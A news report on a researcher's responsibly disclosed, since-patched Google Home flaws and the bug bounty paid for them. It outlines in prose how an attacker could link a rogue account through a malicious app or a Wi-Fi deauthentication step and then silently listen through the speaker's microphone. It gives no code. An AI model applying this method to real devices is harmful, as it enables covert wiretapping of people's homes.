A security researcher was awarded a bug prize of $107,500 for identifying security holes in Google Home smart speakers that could be used to instal backdoors and turn them into wiretapping devices.
The flaws “allowed an attacker within wireless proximity to install a ‘backdoor’ account on the device, enabling them to send commands to it remotely over the internet, access its microphone feed, and make arbitrary HTTP requests within the victim’s LAN,” the researcher, who goes by the name Matt, disclosed in a technical write-up published this week.
Such malicious searches could allow the attacker to directly access other devices connected to the same network in addition to learning the Wi-Fi password. Following a responsible disclosure on January 8, 2021, Google fixed the issues in April 2021. In a word, the problem is that by utilising the Google Home software architecture, a malicious Google user account may be added to a target’s home automation system.
In a series of attacks described by the researcher, a threat actor wishing to eavesdrop on a victim can persuade them to instal a malicious Android app, which, when it discovers a Google Home device on the network, sends covert HTTP requests to connect the attacker’s account to the victim’s device. A step further revealed that a Google Home device could be induced to enter “setup mode” and establish its own open Wi-Fi network by conducting a Wi-Fi de-authentication attack to force it to detach from the network.
The threat actor can then connect to the setup network of the device and request data such as the device name, cloud device id, and certificate in order to associate their account with the device. Regardless of the attack sequence employed, a successful connecting method enables the attacker to exploit Google Home features to mute the device’s volume to zero and call a predetermined phone number whenever they want to listen in on the victim through the microphone.
“The only thing the victim may notice is that the device’s LEDs turn solid blue, but they’d probably just assume it’s updating the firmware or something,” Matt said. “During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open.”
The attack can also be extended to read files, conduct arbitrary HTTP requests inside the victim’s network, and upload malicious modifications to the associated device that would take effect after a reboot. Attack techniques to covertly listen in on potential targets using voice-activated devices have been devised before.
A team of academics unveiled a method in November 2019 called “Light Commands,” which refers to a MEMS microphone flaw that enables attackers to remotely use light to inject invisible and inaudible commands into well-known voice assistants like Google Assistant, Amazon Alexa, Facebook Portal, and Apple Siri.